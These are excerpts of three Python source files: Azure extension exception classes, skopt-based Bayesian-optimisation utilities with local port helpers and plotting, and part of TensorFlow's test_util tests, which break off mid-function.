def get_error_message(self, operation):
return 'Encountered an issue related to the OneClick scenario: ' \
'{0}'.format(self)
class ManagedIdentityExtMissingException(OneClickException):
"""
This extension being present is required for the OneClick scenario
"""
error_code = ManagedIdentityExtMissingErrorCode
def get_error_message(self, operation):
return 'The ManagedIdentity extension is required to be installed ' \
'for Automatic Management to be enabled. Please set ' \
'EnableAutomaticManagement to false in public settings or ' \
'install the ManagedIdentityExtensionForLinux Azure VM ' \
'extension.'
class ManagedIdentityExtException(OneClickException):
"""
Thrown when we encounter an issue with ManagedIdentityExtensionForLinux
"""
error_code = ManagedIdentityExtErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the ManagedIdentity extension: ' \
'{0}'.format(self)
class MetadataAPIException(OneClickException):
"""
Thrown when we encounter an issue with Metadata API
"""
error_code = MetadataAPIErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the Metadata API: {0}'.format(self)
class OMSServiceOneClickException(OneClickException):
"""
Thrown when prerequisites were satisfied but could not retrieve the managed
workspace information from OMS service
"""
error_code = OMSServiceOneClickErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the OMS service: ' \
'{0}'.format(self)
if __name__ == '__main__' :
main()
|
utils.py | # from sklearn.gaussian_process.kernels import ConstantKernel
# from sklearn.gaussian_process.kernels import Matern
# the sklearn kernels do not implement gradients!
from skopt.learning.gaussian_process.kernels import ConstantKernel
from skopt.learning.gaussian_process.kernels import HammingKernel
from skopt.learning.gaussian_process.kernels import Matern
from skopt.learning import GaussianProcessRegressor
from skopt.space import Space, Categorical, Integer, Real, Dimension
from scipy.optimize import OptimizeResult
from sklearn.utils import check_random_state
import numpy as np
import socket
import os
import threading
import queue
import time
import matplotlib.pyplot as plt
from matplotlib.pyplot import cm
plt.style.use('seaborn')
def normalize_dimensions(dimensions):
"""Create a ``Space`` where all dimensions are normalized to unit range.
This is particularly useful for Gaussian process based regressors and is
used internally by ``gp_minimize``.
Parameters
----------
dimensions : list, shape (n_dims,)
List of search space dimensions.
Each search dimension can be defined either as
- a `(lower_bound, upper_bound)` tuple (for `Real` or `Integer`
dimensions),
- a `(lower_bound, upper_bound, "prior")` tuple (for `Real`
dimensions),
- as a list of categories (for `Categorical` dimensions), or
- an instance of a `Dimension` object (`Real`, `Integer` or
`Categorical`).
NOTE: The upper and lower bounds are inclusive for `Integer`
dimensions.
"""
space = Space(dimensions)
transformed_dimensions = []
for dimension in space.dimensions:
if isinstance(dimension, Categorical):
transformed_dimensions.append(Categorical(dimension.categories,
dimension.prior,
name=dimension.name,
transform="normalize"))
# To make sure that GP operates in the [0, 1] space
elif isinstance(dimension, Real):
transformed_dimensions.append(
Real(dimension.low, dimension.high, dimension.prior,
name=dimension.name,
transform="normalize",
dtype=dimension.dtype)
)
elif isinstance(dimension, Integer):
transformed_dimensions.append(
Integer(dimension.low, dimension.high,
name=dimension.name,
transform="normalize",
dtype=dimension.dtype)
)
else:
raise RuntimeError("Unknown dimension type "
"(%s)" % type(dimension))
return Space(transformed_dimensions)
def cook_estimator(base_estimator, space=None, **kwargs):
"""Cook a default estimator.
For the special base_estimator called "DUMMY" the return value is None.
This corresponds to sampling points at random, hence there is no need
for an estimator.
Parameters
----------
base_estimator : "GP", "RF", "ET", "GBRT", "DUMMY" or sklearn regressor
Should inherit from `sklearn.base.RegressorMixin`.
In addition the `predict` method should have an optional `return_std`
argument, which returns `std(Y | x)`` along with `E[Y | x]`.
If base_estimator is one of ["GP", "RF", "ET", "GBRT", "DUMMY"], a
surrogate model corresponding to the relevant `X_minimize` function
is created.
space : Space instance
Has to be provided if the base_estimator is a gaussian process.
Ignored otherwise.
kwargs : dict
Extra parameters provided to the base_estimator at init time.
"""
if isinstance(base_estimator, str):
base_estimator = base_estimator.upper()
if base_estimator not in ["GP", "ET", "RF", "GBRT", "DUMMY"]:
raise ValueError("Valid strings for the base_estimator parameter "
" are: 'RF', 'ET', 'GP', 'GBRT' or 'DUMMY' not "
"%s." % base_estimator)
elif not is_regressor(base_estimator):
raise ValueError("base_estimator has to be a regressor.")
if base_estimator == "GP":
if space is not None:
space = Space(space)
space = Space(normalize_dimensions(space.dimensions))
n_dims = space.transformed_n_dims
is_cat = space.is_categorical
else:
raise ValueError("Expected a Space instance, not None.")
cov_amplitude = ConstantKernel(1.0, (0.01, 1000.0))
# only special if *all* dimensions are categorical
if is_cat:
other_kernel = HammingKernel(length_scale=np.ones(n_dims))
else:
other_kernel = Matern(
length_scale=np.ones(n_dims),
length_scale_bounds=[(0.01, 100)] * n_dims, nu=2.5)
base_estimator = GaussianProcessRegressor(
kernel=cov_amplitude * other_kernel,
normalize_y=True, noise="gaussian",
n_restarts_optimizer=2)
if ('n_jobs' in kwargs.keys()) and not hasattr(base_estimator, 'n_jobs'):
del kwargs['n_jobs']
base_estimator.set_params(**kwargs)
return base_estimator
def get_host_ip_address():
"""Get the host ip address of the machine where the executor is running.
Returns
-------
host_ip : String
"""
try:
host_name = socket.gethostname()
host_ip = socket.gethostbyname(host_name)
return host_ip
except:
try:
host_ip = socket.gethostbyname('localhost')
return host_ip
except:
host_ip = 'ip_address_NA'
return host_ip
def is_port_available(port):
"""Checks if the given port argument is available.
Returns
-------
result : boolean
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
localhost_ip = socket.gethostbyname("localhost")
sock.bind((localhost_ip, port))
result = True
except:
result = False
sock.close()
return result
def get_available_port(default_port=8787):
"""Returns an available port starting with the argument,
incrementing it by 1 in case it is unavailable.
Returns
-------
default_port : int
"""
while not is_port_available(default_port):
default_port += 1
return default_port
def create_result(Xi, yi, space=None, rng=None, specs=None, models=None):
"""
Initialize an `OptimizeResult` object.
Parameters
----------
Xi : list of lists, shape (n_iters, n_features)
Location of the minimum at every iteration.
yi : array-like, shape (n_iters,)
Minimum value obtained at every iteration.
space : Space instance, optional
Search space.
rng : RandomState instance, optional
State of the random state.
specs : dict, optional
Call specifications.
models : list, optional
List of fit surrogate models.
Returns
-------
res : `OptimizeResult`, scipy object
OptimizeResult instance with the required information.
"""
res = OptimizeResult()
yi = np.asarray(yi)
if np.ndim(yi) == 2:
res.log_time = np.ravel(yi[:, 1])
yi = np.ravel(yi[:, 0])
best = np.argmin(yi)
res.x = Xi[best]
res.fun = yi[best]
res.func_vals = yi
res.x_iters = Xi
res.models = models
res.space = space
res.random_state = rng
res.specs = specs
return res
def plot_convergence(*args, **kwargs):
"""Plot one or several convergence traces.
Parameters
----------
args[i] : `OptimizeResult`, list of `OptimizeResult`, or tuple
The result(s) for which to plot the convergence trace.
- if `OptimizeResult`, then draw the corresponding single trace;
- if list of `OptimizeResult`, then draw the corresponding convergence
traces in transparency, along with the average convergence trace;
- if tuple, then `args[i][0]` should be a string label and `args[i][1]`
an `OptimizeResult` or a list of `OptimizeResult`.
ax : `Axes`, optional
The matplotlib axes on which to draw the plot, or `None` to create
a new one.
true_minimum : float, optional
The true minimum value of the function, if known.
yscale : None or string, optional
The scale for the y-axis.
Returns
-------
ax : `Axes`
The matplotlib axes.
"""
# <3 legacy python
ax = kwargs.get("ax", None)
true_minimum = kwargs.get("true_minimum", None)
yscale = kwargs.get("yscale", None)
if ax is None:
ax = plt.gca()
ax.set_title("Convergence plot")
ax.set_xlabel("Number of calls $n$")
ax.set_ylabel(r"$\min f(x)$ after $n$ calls")
ax.grid()
if yscale is not None:
ax.set_yscale(yscale)
colors = cm.viridis(np.linspace(0.25, 1.0, len(args)))
for results, color in zip(args, colors):
if isinstance(results, tuple):
name, results = results
else:
name = None
if isinstance(results, OptimizeResult):
n_calls = len(results.x_iters)
mins = [np.min(results.func_vals[:i])
for i in range(1, n_calls + 1)]
ax.plot(range(1, n_calls + 1), mins, c=color,
marker=".", markersize=12, lw=2, label=name)
elif isinstance(results, list):
n_calls = len(results[0].x_iters)
iterations = range(1, n_calls + 1)
mins = [[np.min(r.func_vals[:i]) for i in iterations]
for r in results]
for m in mins:
ax.plot(iterations, m, c=color, alpha=0.2)
ax.plot(iterations, np.mean(mins, axis=0), c=color,
marker=".", markersize=12, lw=2, label=name)
if true_minimum:
ax.axhline(true_minimum, linestyle="--",
color="r", lw=1,
label="True minimum")
if true_minimum or name:
ax.legend(loc="best")
ax.grid()
return ax
class MultiThreadTaskQueue(queue.Queue):
def __init__(self, num_threads=1):
queue.Queue.__init__(self)
self.num_threads = num_threads
self.start_threads()
self.results = []
def put_task(self, task, *args, **kwargs):
self.put((task, args, kwargs))
def start_threads(self):
for i in range(self.num_threads):
t = threading.Thread(target=self.task_in_thread)
t.setDaemon(True)
t.start()
def task_in_thread(self):
while True:
task, args, kwargs = self.get()
result = task(*args, **kwargs)
self.results.append(result)
self.task_done()
def get_results(self):
return self.results
|
test_util_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase, parameterized.TestCase):
@test_util.run_deprecated_v1
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
@test_util.run_deprecated_v1
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsBuiltWithROCm(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsBuiltWithROCm():
print("Tensorflow build has ROCm support")
else:
print("Tensorflow build does not have ROCm support")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseList(self):
with self.assertRaisesRegexp(AssertionError, r"not close dif"):
self.assertAllClose([0], [1])
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegexp(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
@test_util.skip_if(True) # b/117665998
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([100] * 3, i)
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
with self.assertRaisesRegexp(AssertionError, r"not equal lhs"):
self.assertAllEqual([0] * 3, k)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
@test_util.run_deprecated_v1
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
@test_util.run_deprecated_v1
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new defeault graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegexp(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
